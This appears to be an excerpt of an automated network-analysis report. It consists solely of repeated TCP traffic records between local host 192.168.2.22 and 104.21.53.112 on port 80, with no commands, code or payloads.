                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
